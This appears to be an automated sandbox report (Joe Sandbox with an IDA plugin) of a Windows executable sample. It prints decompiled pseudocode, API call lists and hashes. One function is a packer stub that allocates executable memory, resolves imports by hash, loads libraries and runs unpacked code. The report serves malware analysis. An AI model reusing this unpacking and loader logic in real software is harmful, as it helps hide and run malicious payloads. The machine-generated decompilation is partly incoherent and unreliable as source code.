                                                    				CHAR* _v8;
                                                    				intOrPtr* _v24;
                                                    				intOrPtr _v28;
                                                    				struct _STARTUPINFOA _v96;
                                                    				char _v100;
                                                    				char _v104;
                                                    				int _v108;
                                                    				char _v112;
                                                    				char _v116;
                                                    				intOrPtr* _v120;
                                                    				intOrPtr _v124;
                                                    				intOrPtr* _t23;
                                                    				intOrPtr* _t24;
                                                    				intOrPtr* _t25;
                                                    				void* _t27;
                                                    				char _t29;
                                                    				intOrPtr* _t35;
                                                    				intOrPtr _t36;
                                                    				signed int _t38;
                                                    				int _t40;
                                                    				intOrPtr* _t41;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t46;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t49;
                                                    				intOrPtr* _t55;
                                                    				void* _t56;
                                                    				intOrPtr _t58;
                                                    				intOrPtr _t61;
                                                    
                                                    				 *[fs:0x0] = _t58;
                                                    				_v28 = _t58 - 0x68;
                                                    				_v8 = 0;
                                                    				 *0x4172ec(2, __edi, __esi, __ebx,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t56);
                                                    				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
                                                    				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
                                                    				_t23 =  *0x4172f0();
                                                    				_t46 =  *0x41c9b8; // 0x0
                                                    				 *_t23 = _t46;
                                                    				_t24 =  *0x4172f4();
                                                    				_t47 =  *0x41c9b4; // 0x0
                                                    				 *_t24 = _t47;
                                                    				_t25 =  *0x4172fc; // 0x74896be4
                                                    				 *0x41cbdc =  *_t25;
                                                    				_t27 = E0041559B( *_t25);
                                                    				_t61 =  *0x41c8c8; // 0x1
                                                    				if(_t61 == 0) {
                                                    					_t27 =  *0x4172e4(E00415598);
                                                    				}
                                                    				E00415586(_t27);
                                                    				L00415580();
                                                    				_t29 =  *0x41c9b0; // 0x0
                                                    				_v112 = _t29;
                                                    				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
                                                    				_push(0x41c024);
                                                    				_push(0x41c000); // executed
                                                    				L00415580(); // executed
                                                    				_t35 =  *0x4172d8; // 0x74895b9c
                                                    				_t55 =  *_t35;
                                                    				_v120 = _t55;
                                                    				if( *_t55 != 0x22) {
                                                    					while( *_t55 > 0x20) {
                                                    						_t55 = _t55 + 1;
                                                    						_v120 = _t55;
                                                    					}
                                                    				} else {
                                                    					do {
                                                    						_t55 = _t55 + 1;
                                                    						_v120 = _t55;
                                                    						_t42 =  *_t55;
                                                    					} while (_t42 != 0 && _t42 != 0x22);
                                                    					if( *_t55 == 0x22) {
                                                    						L6:
                                                    						_t55 = _t55 + 1;
                                                    						_v120 = _t55;
                                                    					}
                                                    				}
                                                    				_t36 =  *_t55;
                                                    				if(_t36 != 0 && _t36 <= 0x20) {
                                                    					goto L6;
                                                    				}
                                                    				_v96.dwFlags = 0;
                                                    				GetStartupInfoA( &_v96);
                                                    				if((_v96.dwFlags & 0x00000001) == 0) {
                                                    					_t38 = 0xa;
                                                    				} else {
                                                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                    				}
                                                    				_t40 = E004155C6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                                    				_v108 = _t40;
                                                    				exit(_t40);
                                                    				_t41 = _v24;
                                                    				_t49 =  *((intOrPtr*)( *_t41));
                                                    				_v124 = _t49;
                                                    				_push(_t41);
                                                    				_push(_t49);
                                                    				L0041557A();
                                                    				return _t41;
                                                    			}

































                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                    • String ID:
                                                    • API String ID: 801014965-0
                                                    • Opcode ID: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
                                                    • Instruction ID: c74af80d35e2c67a5f516f5a1d0bf5d206878bc3e350f766078b7051b9745e2e
                                                    • Opcode Fuzzy Hash: dc342064fc473dd6211d3b0943abf782a1a2789885f7a3c13764eacea4c338bf
                                                    • Instruction Fuzzy Hash: 4141ACB1984744EFDB20DFA4DC85AEA7BBAEB48710F20416BF441972A1C7785881CB18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 84%
                                                    			E004010DF(void* __ecx, void* __eflags, intOrPtr _a4, long _a8, intOrPtr* _a12) {
                                                    				void* _v8;
                                                    				void _v4103;
                                                    				void _v4104;
                                                    				void* _t22;
                                                    				void* _t29;
                                                    				intOrPtr* _t42;
                                                    				void* _t46;
                                                    				void* _t47;
                                                    				void* _t48;
                                                    
                                                    				E00415390(0x1004, __ecx);
                                                    				_v4104 = 0;
                                                    				memset( &_v4103, 0, 0x3ff << 2);
                                                    				_t47 = _t46 + 0xc;
                                                    				asm("stosw");
                                                    				asm("stosb"); // executed
                                                    				_t22 = CreateFileA(_a8, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                                    				_v8 = _t22;
                                                    				if(_t22 != 0xffffffff) {
                                                    					_t42 = _a12;
                                                    					while(1) {
                                                    						_a8 = 0;
                                                    						memset( &_v4104, 0, 0x1000);
                                                    						_t48 = _t47 + 0xc;
                                                    						ReadFile(_v8,  &_v4104, 0x1000,  &_a8, 0); // executed
                                                    						if(_a8 == 0) {
                                                    							break;
                                                    						}
                                                    						memcpy( *_t42 + _a4,  &_v4104, _a8);
                                                    						_t47 = _t48 + 0xc;
                                                    						 *_t42 =  *_t42 + _a8;
                                                    					}
                                                    					FindCloseChangeNotification(_v8); // executed
                                                    					_t29 = 1;
                                                    					return _t29;
                                                    				}
                                                    				return 0;
                                                    			}













                                                    APIs
                                                    • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A
                                                    • memset.MSVCRT ref: 00401141
                                                    • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401159
                                                    • memcpy.MSVCRT ref: 00401174
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00401186
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: File$ChangeCloseCreateFindNotificationReadmemcpymemset
                                                    • String ID:
                                                    • API String ID: 4020786314-0
                                                    • Opcode ID: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
                                                    • Instruction ID: b3c3ea1559986d33b90c3f3678d17a695d6118acee8a61d0ddd5dd874004b1bb
                                                    • Opcode Fuzzy Hash: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
                                                    • Instruction Fuzzy Hash: 7C117F72900249BFDB128F58DC81BDA77ACEB08365F108076FB19E6190D2749B548B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 16%
                                                    			E004B5DAE(intOrPtr _a32, char _a846, intOrPtr _a2801, intOrPtr _a2805, intOrPtr _a2809, intOrPtr _a2813, intOrPtr _a2817, intOrPtr _a2821, void* _a6897, void* _a6921, intOrPtr _a6929, intOrPtr _a6965, intOrPtr _a6977, char _a6981, char _a6992, char _a7034, char _a7074, char _a7131, intOrPtr _a8349, char _a8369, intOrPtr _a8546, intOrPtr _a9058, intOrPtr _a9791, signed int* _a9795, void* _a9799, char _a9803) {
                                                    				CHAR* _v16;
                                                    				intOrPtr* _v24;
                                                    				struct _STARTUPINFOA _v96;
                                                    				char _v100;
                                                    				char _v104;
                                                    				int _v108;
                                                    				char _v112;
                                                    				char _v116;
                                                    				intOrPtr* _v120;
                                                    				intOrPtr _v124;
                                                    				intOrPtr* _t96;
                                                    				void* _t100;
                                                    				signed int* _t102;
                                                    				void* _t104;
                                                    				intOrPtr _t107;
                                                    				void* _t109;
                                                    				void* _t112;
                                                    				signed int* _t118;
                                                    				signed int _t120;
                                                    				void* _t121;
                                                    				char* _t122;
                                                    				signed int _t123;
                                                    				void* _t126;
                                                    				intOrPtr* _t132;
                                                    				intOrPtr* _t133;
                                                    				intOrPtr* _t134;
                                                    				void* _t136;
                                                    				char _t138;
                                                    				intOrPtr* _t144;
                                                    				intOrPtr _t145;
                                                    				signed int _t147;
                                                    				int _t149;
                                                    				intOrPtr* _t150;
                                                    				intOrPtr _t151;
                                                    				void* _t155;
                                                    				intOrPtr* _t156;
                                                    				intOrPtr* _t157;
                                                    				intOrPtr _t165;
                                                    				intOrPtr _t166;
                                                    				intOrPtr _t168;
                                                    				CHAR* _t175;
                                                    				signed int _t176;
                                                    				void* _t177;
                                                    				void* _t178;
                                                    				void* _t179;
                                                    				char* _t180;
                                                    				intOrPtr* _t181;
                                                    				intOrPtr* _t182;
                                                    				void* _t183;
                                                    				signed int* _t185;
                                                    				intOrPtr* _t186;
                                                    				intOrPtr _t188;
                                                    				intOrPtr* _t190;
                                                    				intOrPtr _t191;
                                                    				intOrPtr _t204;
                                                    
                                                    				_t188 =  *_t190;
                                                    				_t191 = _t190 + 4;
                                                    				_t180 =  &_a9803;
                                                    				_t156 =  &_a846;
                                                    				_t175 = 0;
                                                    				E004B6059(0, _t180);
                                                    				_a6897 = VirtualAlloc(0, 0xc2000, 0x1000, 0x40);
                                                    				while( *((intOrPtr*)(_t175 + _t180)) != 0) {
                                                    					asm("pushad");
                                                    					_t96 =  *_t156( *((intOrPtr*)(_t175 + _t180 + 4)),  *((intOrPtr*)(_t175 + _t180)), _a6897);
                                                    					asm("popad");
                                                    					_t175 = _t175 + 8;
                                                    				}
                                                    				_t31 = _t180 + 4; // 0x4
                                                    				_t181 = _t175 + _t31;
                                                    				if(_a9058 != 1) {
                                                    					_t182 = _t181 + 8;
                                                    				} else {
                                                    					_t179 = 0;
                                                    					asm("pushad");
                                                    					while(1) {
                                                    						_t179 = _t179;
                                                    						if(_t179 != 0) {
                                                    							break;
                                                    						}
                                                    						_t156 =  *((intOrPtr*)(_t181 + 4));
                                                    						_t155 = E004B6041( *_t181, _t156);
                                                    						_push( &_a8369);
                                                    						if( *((intOrPtr*)(_t181 + 8)) != 0) {
                                                    							_push(0x40);
                                                    						} else {
                                                    							_push(0x20);
                                                    						}
                                                    						_t96 = _a2817(_t156, _t155);
                                                    						_t181 = _t181 + 0xc;
                                                    						if( *_t181 == 0xffffffff) {
                                                    							_t179 = _t179 + 1;
                                                    						}
                                                    					}
                                                    					_a32 = _t181 + 4;
                                                    					asm("popad");
                                                    					_t182 = _t96;
                                                    				}
                                                    				_a6929 =  *_t182;
                                                    				_t183 = _t182 + 4;
                                                    				E004B77E1(_t183);
                                                    				_a9799 = VirtualAlloc(0, 0xbbc, 0x1000, 0x40);
                                                    				_t157 = _t156;
                                                    				asm("pushad");
                                                    				_t100 =  *_t157(_a9799, _t183 + 4, _a6897);
                                                    				asm("popad");
                                                    				E004B7114(_t100);
                                                    				if(_a8546 != 0 && _a8349 != 0) {
                                                    					E004B73CF();
                                                    					E004B726C();
                                                    				}
                                                    				_t185 = _a9799;
                                                    				_t102 = _t185;
                                                    				while( *_t102 != 1) {
                                                    					_t102 =  &(_t102[0]);
                                                    				}
                                                    				_t176 = _t102[0];
                                                    				_t104 = E004B6025( &(_t102[0]), _t176);
                                                    				_t105 = _t104 + 4;
                                                    				_a9795 = _t104 + 4;
                                                    				while( *_t185 != 1) {
                                                    					E004B6920(_t105);
                                                    					_t107 = _a2821(_t185);
                                                    					if(_t107 == 0) {
                                                    						_t177 = 0;
                                                    						goto L64;
                                                    					} else {
                                                    						_a9791 = _t107;
                                                    						_t118 = _t185;
                                                    						L51:
                                                    						while( *_t118 != 0) {
                                                    							while(1) {
                                                    								_t120 =  *_a9795;
                                                    								if((_t120 & 0x80000000) == 0) {
                                                    									_push(_a9795);
                                                    								} else {
                                                    									_t123 = _t120 ^ 0x80000000;
                                                    									_push(_t123);
                                                    									_a6921 = _t123;
                                                    									 *_a9795 = 0x202020;
                                                    								}
                                                    								_t121 = _a2805(_a9791);
                                                    								if(_t121 == 0) {
                                                    									break;
                                                    								}
                                                    								_a6921 = 0;
                                                    								 *_t176 = _t121;
                                                    								_t176 = _t176 + 4;
                                                    								_t122 = _a9795;
                                                    								while( *_t122 != 0) {
                                                    									_t122 = _t122 + 1;
                                                    								}
                                                    								_t118 = _t122 + 1;
                                                    								_a9795 = _t118;
                                                    								if(( *_t118 & 0x80000000) != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L51;
                                                    								}
                                                    								goto L75;
                                                    							}
                                                    							if(_a6921 != 0) {
                                                    								_t177 = 2;
                                                    							} else {
                                                    								_t177 = 1;
                                                    							}
                                                    							L64:
                                                    							_a9799 = _a2809(0, 0x1000, 0x1000, 0x40);
                                                    							_t109 = _a2801( &_a6981);
                                                    							_push(_t109);
                                                    							if(_a6965 == 0xabbc680d) {
                                                    								_push(_a6965);
                                                    								_push(_t109);
                                                    								_a6965 = E004B784E();
                                                    							}
                                                    							_pop(_t110);
                                                    							if(_a6977 == 0xea3af0d7) {
                                                    								_push(_a6977);
                                                    								_a6977 = E004B784E();
                                                    							}
                                                    							_t178 = _t177;
                                                    							if(_t178 != 0) {
                                                    								if(_t178 != 1) {
                                                    									if(_t178 == 2) {
                                                    										_a6977(_a9799,  &_a7131, _a6921, _t185);
                                                    									}
                                                    								} else {
                                                    									_a6977(_a9799,  &_a7074, _a9795, _t185);
                                                    								}
                                                    							} else {
                                                    								_a6977(_a9799,  &_a7034, _t185);
                                                    							}
                                                    							_a6965(0, _a9799,  &_a6992, 0x30);
                                                    							_t112 = _a2813(_a9799, 0x1000, 0x4000);
                                                    							asm("popad");
                                                    							return _t112;
                                                    							goto L75;
                                                    						}
                                                    						while( *_t185 != 0) {
                                                    							_t185 =  &(_t185[0]);
                                                    						}
                                                    						_t185 =  &(_t185[0]);
                                                    						_t176 = _t118[0];
                                                    						_t126 = E004B6025( &(_t118[0]), _t176);
                                                    						_t105 = _t126 + 4;
                                                    						_a9795 = _t126 + 4;
                                                    						continue;
                                                    					}
                                                    					L75:
                                                    				}
                                                    				VirtualFree(_a9799, 0xbbc, 0x4000);
                                                    				VirtualFree(_a6897, 0xc2000, 0x4000);
                                                    				E004B6088();
                                                    				asm("popad");
                                                    				 *[fs:0x0] = _t191;
                                                    				_v96.hStdOutput = _t191 - 0x68;
                                                    				_v16 = 0;
                                                    				 *0x4172ec(2, _t176, _t185, _t157,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t188);
                                                    				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
                                                    				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
                                                    				_t132 =  *0x4172f0();
                                                    				_t165 =  *0x41c9b8; // 0x0
                                                    				 *_t132 = _t165;
                                                    				_t133 =  *0x4172f4();
                                                    				_t166 =  *0x41c9b4; // 0x0
                                                    				 *_t133 = _t166;
                                                    				_t134 =  *0x4172fc; // 0x74896be4
                                                    				 *0x41cbdc =  *_t134;
                                                    				_t136 = E0041559B( *_t134);
                                                    				_t204 =  *0x41c8c8; // 0x1
                                                    				if(_t204 == 0) {
                                                    					_t136 =  *0x4172e4(E00415598);
                                                    				}
                                                    				E00415586(_t136);
                                                    				L00415580();
                                                    				_t138 =  *0x41c9b0; // 0x0
                                                    				_v112 = _t138;
                                                    				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
                                                    				_push(0x41c024);
                                                    				_push(0x41c000); // executed
                                                    				L00415580(); // executed
                                                    				_t144 =  *0x4172d8; // 0x74895b9c
                                                    				_t186 =  *_t144;
                                                    				_v120 = _t186;
                                                    				if( *_t186 != 0x22) {
                                                    					while( *_t186 > 0x20) {
                                                    						_t186 = _t186 + 1;
                                                    						_v120 = _t186;
                                                    					}
                                                    				} else {
                                                    					do {
                                                    						_t186 = _t186 + 1;
                                                    						_v120 = _t186;
                                                    						_t151 =  *_t186;
                                                    					} while (_t151 != 0 && _t151 != 0x22);
                                                    					if( *_t186 == 0x22) {
                                                    						L7:
                                                    						_t186 = _t186 + 1;
                                                    						_v120 = _t186;
                                                    					}
                                                    				}
                                                    				_t145 =  *_t186;
                                                    				if(_t145 != 0 && _t145 <= 0x20) {
                                                    					goto L7;
                                                    				}
                                                    				_v96.dwFlags = 0;
                                                    				GetStartupInfoA( &_v96);
                                                    				if((_v96.dwFlags & 0x00000001) == 0) {
                                                    					_t147 = 0xa;
                                                    				} else {
                                                    					_t147 = _v96.wShowWindow & 0x0000ffff;
                                                    				}
                                                    				_t149 = E004155C6(GetModuleHandleA(0), _t148, 0, _t186, _t147);
                                                    				_v108 = _t149;
                                                    				exit(_t149);
                                                    				_t150 = _v24;
                                                    				_t168 =  *((intOrPtr*)( *_t150));
                                                    				_v124 = _t168;
                                                    				_push(_t150);
                                                    				_push(_t168);
                                                    				L0041557A();
                                                    				return _t150;
                                                    				goto L75;
                                                    			}

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,000C2000,00001000,00000040), ref: 004B5DE4
                                                    • VirtualAlloc.KERNELBASE(00000000,00000BBC,00001000,00000040,?), ref: 004B5E87
                                                    • VirtualFree.KERNELBASE(?,00000BBC,00004000), ref: 004B5FBB
                                                    • VirtualFree.KERNELBASE(?,000C2000,00004000), ref: 004B5FD1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2087232378-0
                                                    • Opcode ID: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
                                                    • Instruction ID: 24e4992b9d6948e21e8e4bedf5f1e11d57e5dbc52c2922d56559ceabe911fcce
                                                    • Opcode Fuzzy Hash: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
                                                    • Instruction Fuzzy Hash: 0691E471944689EFEF31AF60CC09BEABB65EF05300F210016F94E5A291D3B95B51DB2A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E00401703(void* __ecx) {
                                                    				void* _t28;
                                                    				void* _t30;
                                                    
                                                    				L004153D0();
                                                    				_t28 = __ecx;
                                                    				_push(0);
                                                    				L00415208();
                                                    				L00415202();
                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *0x417284())) + 4)) == 0) {
                                                    					E00401194(); // executed
                                                    				}
                                                    				if(E004013BC() != 0) {
                                                    					ExitProcess(0xffffffff);
                                                    				}
                                                    				_push(0);
                                                    				E00401831(_t30 - 0x90);
                                                    				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                    				 *((intOrPtr*)(_t28 + 0x20)) = _t30 - 0x90;
                                                    				L004151FC();
                                                    				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
                                                    				E0040178C(_t30 - 0x90);
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                                    				return 0;
                                                    			}






                                                    APIs
                                                    • _EH_prolog.MSVCRT ref: 00401708
                                                    • __p___argv.MSVCRT ref: 00401725
                                                    • ExitProcess.KERNEL32 ref: 00401743
                                                      • Part of subcall function 00401194: memset.MSVCRT ref: 004011B5
                                                      • Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011C4
                                                      • Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011E6
                                                      • Part of subcall function 00401194: Sleep.KERNEL32(00000064), ref: 004011FB
                                                      • Part of subcall function 00401194: GetTickCount.KERNEL32 ref: 00401233
                                                      • Part of subcall function 00401194: GetTempPathA.KERNEL32(00000104,?), ref: 00401263
                                                      • Part of subcall function 00401194: wsprintfA.USER32 ref: 00401280
                                                      • Part of subcall function 00401194: CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
                                                      • Part of subcall function 00401194: time.MSVCRT ref: 004012AA
                                                      • Part of subcall function 00401831: _EH_prolog.MSVCRT ref: 00401836
                                                      • Part of subcall function 00401831: LoadIconA.USER32(00000000,00000080), ref: 004018D8
                                                      • Part of subcall function 0040178C: _EH_prolog.MSVCRT ref: 00401791
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: H_prolog__p___argv$CountCreateExitFileIconLoadPathProcessSleepTempTickmemsettimewsprintf
                                                    • String ID:
                                                    • API String ID: 3574655727-0
                                                    • Opcode ID: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
                                                    • Instruction ID: d643b5abc61cb50e4851cccbfb1eddeb9cb1e70d3b45357e864f9708fc649bd8
                                                    • Opcode Fuzzy Hash: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
                                                    • Instruction Fuzzy Hash: 08016D31910514CFDB24FB75C80ABDCB7B4BF44318F4042AEA425A35E2EB789A44CA59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 189 415340-415347 190 415355-41536b __dllonexit 189->190 191 415349-415354 _onexit 189->191
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: __dllonexit_onexit
                                                    • String ID:
                                                    • API String ID: 2384194067-0
                                                    • Opcode ID: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
                                                    • Instruction ID: 98d401c415d6678ea52b1c0f42600251c3288c2a67878add2b384861b0e27a05
                                                    • Opcode Fuzzy Hash: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
                                                    • Instruction Fuzzy Hash: 8CC0123168D600FBCA005710BD47ACA3B22A790F76B6482ABF465D40F0D77D7450B90D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 192 4b7114-4b711b 193 4b7141-4b7144 192->193 194 4b711d-4b7126 193->194 195 4b7146-4b7147 193->195 197 4b7138 194->197 198 4b7128-4b7131 LoadLibraryA 194->198 200 4b713b-4b713e 197->200 198->197 199 4b7133 call 4b7148 198->199 199->197 202 4b713a 200->202 203 4b7140 200->203 202->200 203->193
                                                    C-Code - Quality: 82%
                                                    			E004B7114(struct HINSTANCE__* __eax) {
                                                    				struct HINSTANCE__* _t4;
                                                    				CHAR* _t7;
                                                    				void* _t8;
                                                    
                                                    				_t4 = __eax;
                                                    				asm("pushad");
                                                    				_t7 =  *(_t8 + 0x2647);
                                                    				while( *_t7 != 1) {
                                                    					_t4 =  *((intOrPtr*)(_t8 + 0xb05))(_t7);
                                                    					if(_t4 == 0) {
                                                    						_t4 = LoadLibraryA(_t7);
                                                    						if(_t4 == 0) {
                                                    							_t4 = E004B7148(_t7);
                                                    						}
                                                    					}
                                                    					while( *_t7 != 0) {
                                                    						_t7 =  &(_t7[1]);
                                                    					}
                                                    					_t7 =  &(_t7[1]);
                                                    				}
                                                    				asm("popad");
                                                    				return _t4;
                                                    			}







                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 004B7129
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
                                                    • Instruction ID: 28aa9155c9c21b83bdb7bcef97a423d10cb3e5a31c1a923e1a5360d2fc2f006b
                                                    • Opcode Fuzzy Hash: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
                                                    • Instruction Fuzzy Hash: 6EE0122054D5A566DF322F2C48057EA7AD06FA2354F211466E4C6A5701F7AC0D829BFE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00401A9F(void* __ecx, void* __edx) {
                                                    				struct tagRECT _v20;
                                                    				signed int _v100;
                                                    				void* _v104;
                                                    				int _t15;
                                                    				int _t20;
                                                    				int _t21;
                                                    				int _t36;
                                                    				void* _t44;
                                                    				void* _t49;
                                                    
                                                    				_t44 = __edx;
                                                    				_t49 = __ecx;
                                                    				_t15 = IsIconic( *(__ecx + 0x20));
                                                    				if(_t15 == 0) {
                                                    					L0041530A();
                                                    					return _t15;
                                                    				}
                                                    				_push(_t49);
                                                    				L00415316();
                                                    				asm("sbb eax, eax");
                                                    				SendMessageA( *(_t49 + 0x20), 0x27,  ~( &_v104) & _v100, 0);
                                                    				_t20 = GetSystemMetrics(0xb);
                                                    				_t21 = GetSystemMetrics(0xc);
                                                    				GetClientRect( *(_t49 + 0x20),  &_v20);
                                                    				asm("cdq");
                                                    				asm("cdq");
                                                    				_t36 = DrawIcon(_v100, _v20.right - _v20.left - _t20 + 1 - _t44 >> 1, _v20.bottom - _v20.top - _t21 + 1 - _t44 >> 1,  *(_t49 + 0x80));
                                                    				L00415310();
                                                    				return _t36;
                                                    			}













                                                    APIs
                                                    • IsIconic.USER32(?), ref: 00401AAB
                                                    • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401AD2
                                                    • GetSystemMetrics.USER32(0000000B), ref: 00401AE0
                                                    • GetSystemMetrics.USER32(0000000C), ref: 00401AE6
                                                    • GetClientRect.USER32(?,?), ref: 00401AF1
                                                    • DrawIcon.USER32(?,?,?,?), ref: 00401B1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                    • String ID:
                                                    • API String ID: 2166663075-0
                                                    • Opcode ID: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
                                                    • Instruction ID: 088e3e68de5ff62e47a0c8f7cb64779c5762a4f9d9f917aba8eef08205d66377
                                                    • Opcode Fuzzy Hash: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
                                                    • Instruction Fuzzy Hash: B511517261021DAFCB00ABB8DD49EEEB7B9FB84304F044629F956D70A0DB74E901DB14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00414FFF(void* __ecx, void* __eflags) {
